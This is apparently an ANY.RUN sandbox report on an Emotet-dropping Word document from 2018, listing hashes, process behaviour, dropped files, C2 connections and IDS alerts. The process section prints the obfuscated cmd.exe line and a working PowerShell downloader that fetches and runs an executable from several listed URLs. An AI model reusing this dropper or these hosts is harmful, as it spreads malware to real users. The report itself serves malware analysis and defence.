analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IBAN_DE13 4406 6094 5638 8093 17.doc

Full analysis: https://app.any.run/tasks/f0b6e507-5746-41a1-ba9a-90d5bda841c5
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 12:32:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 07:36:00 2018, Last Saved Time/Date: Tue Dec 18 07:36:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0
MD5:

0886D55B8D4251618C8A5ABBF0BD9E0B

SHA1:

09FA32F617C604635A686510059EF7F31E1335E9

SHA256:

2E058A6055D0A07A50B9587A5651B170B6BDBBE08529213167AE248B24EE6312

SSDEEP:

1536:FL4w1LD4fbKghmXB5luOUom8uW41LIpiXievnH+a9:Fcw13eKQOUo101O+iev

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 995.exe (PID: 2328)
      • archivesymbol.exe (PID: 3080)
      • 995.exe (PID: 3584)
      • archivesymbol.exe (PID: 3876)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3132)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3552)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3060)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3552)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3060)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3876)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3876)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3876)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2600)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3060)
      • 995.exe (PID: 3584)
    • Creates files in the user directory

      • powershell.exe (PID: 3060)
    • Application launched itself

      • cmd.exe (PID: 2600)
    • Starts itself from another location

      • 995.exe (PID: 3584)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3876)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3552)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3552)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 37
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 33
Words: 5
Pages: 1
ModifyDate: 2018:12:18 07:36:00
CreateDate: 2018:12:18 07:36:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 995.exe no specs 995.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3552"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\IBAN_DE13 4406 6094 5638 8093 17.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2600c:\sVwCiOzTWNiPm\WzCkFlcVSW\VlBsmipsbU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3132CmD /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3060powershell $zZt='jvr';$Ltz=new-object Net.WebClient;$Pjq='http://www.rennstall-vovcenko.com/Y2sGKrwgN0@http://www.swanseacomputerservices.com/8UxRSIWRUf@http://michma.org/23VXII8@http://www.afamafaial.org/IEp6bv0@http://www.pinkshopeg.com/1iJm3fO'.Split('@');$krb='Ivl';$kCW = '995';$ucT='zKS';$cES=$env:temp+'\'+$kCW+'.exe';foreach($zFN in $Pjq){try{$Ltz.DownloadFile($zFN, $cES);$jhw='tpq';If ((Get-Item $cES).length -ge 80000) {Invoke-Item $cES;$zbl='zLT';break;}}catch{}}$ojF='Wcj';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2328"C:\Users\admin\AppData\Local\Temp\995.exe" C:\Users\admin\AppData\Local\Temp\995.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3584"C:\Users\admin\AppData\Local\Temp\995.exe"C:\Users\admin\AppData\Local\Temp\995.exe
995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3080"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3876"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 741
Read events
1 252
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
3552WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA6E2.tmp.cvr
MD5:
SHA256:
3552WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A202841.wmf
MD5:
SHA256:
3552WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\730354F7.wmf
MD5:
SHA256:
3060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G0OFULZUV7YIF07ESW0.temp
MD5:
SHA256:
3552WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E094F940.wmfwmf
MD5:78BE138748FF69170709633A86E877D2
SHA256:8DABB7C5738E97B86DD17CB4E8A2E7389FC782BDCFC36EF7984EFA00EEE3A9BF
3552WINWORD.EXEC:\Users\admin\Desktop\~$AN_DE13 4406 6094 5638 8093 17.docpgc
MD5:AA7766B4EE0D5540ABF314476C7643BF
SHA256:5CD5075B2BE8768FB2B4ABDEF29CC8DD548A48BB1FE503E7B0F9852ECFD6049A
3552WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4F5F40C47DDD92765B47161B15380CF9
SHA256:3A34E29F643B0F7C1B38279E3FA88B8310EFE43FDAF57CAE22CE4944767D3F29
3552WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:5932F4C491B920C69BC6193181F8838A
SHA256:21FA4DE0986C47D9CBBF5BE64F63CF8C4F0CF6EC611836C2FCA90AF24E40CBA9
3552WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:0EE776764088EB8486A1BE2FF605DB52
SHA256:BF26631F070BCD1C2DD5E66290B28BBE4FFB5DD6C296DB3455A77896D53C6B1B
3552WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1204F14E.wmfwmf
MD5:42310CC18B5F9A8DD5C9574B3B89987A
SHA256:08EF0F0E76E40F15DD33B08E697E3021AE7D57251B5C175EBB5FE7C38C7A8F91
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
9
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3876
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
3876
archivesymbol.exe
GET
181.197.253.133:8080
http://181.197.253.133:8080/
AR
suspicious
3876
archivesymbol.exe
GET
201.190.150.60:443
http://201.190.150.60:443/
AR
malicious
3876
archivesymbol.exe
GET
187.140.90.91:8080
http://187.140.90.91:8080/
MX
malicious
3060
powershell.exe
GET
200
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0/
SE
executable
124 Kb
malicious
3876
archivesymbol.exe
GET
200
70.55.69.202:7080
http://70.55.69.202:7080/
CA
binary
132 b
suspicious
3060
powershell.exe
GET
301
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0
SE
html
253 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3876
archivesymbol.exe
81.150.17.158:50000
British Telecommunications PLC
GB
malicious
3876
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
3876
archivesymbol.exe
201.190.150.60:443
ARLINK S.A.
AR
malicious
3060
powershell.exe
93.90.146.103:80
www.rennstall-vovcenko.com
Levonline AB
SE
suspicious
3876
archivesymbol.exe
70.55.69.202:7080
Bell Canada
CA
suspicious
3876
archivesymbol.exe
181.197.253.133:8080
BVNET S.A.
AR
suspicious
3876
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
3876
archivesymbol.exe
81.150.17.158:8443
British Telecommunications PLC
GB
malicious
3876
archivesymbol.exe
187.140.90.91:8080
Uninet S.A. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
www.rennstall-vovcenko.com
  • 93.90.146.103
malicious

Threats

PID
Process
Class
Message
3060
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3060
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3060
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3060
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3060
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3876
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3876
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3876
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3876
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3876
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
5 ETPRO signatures available at the full report
No debug info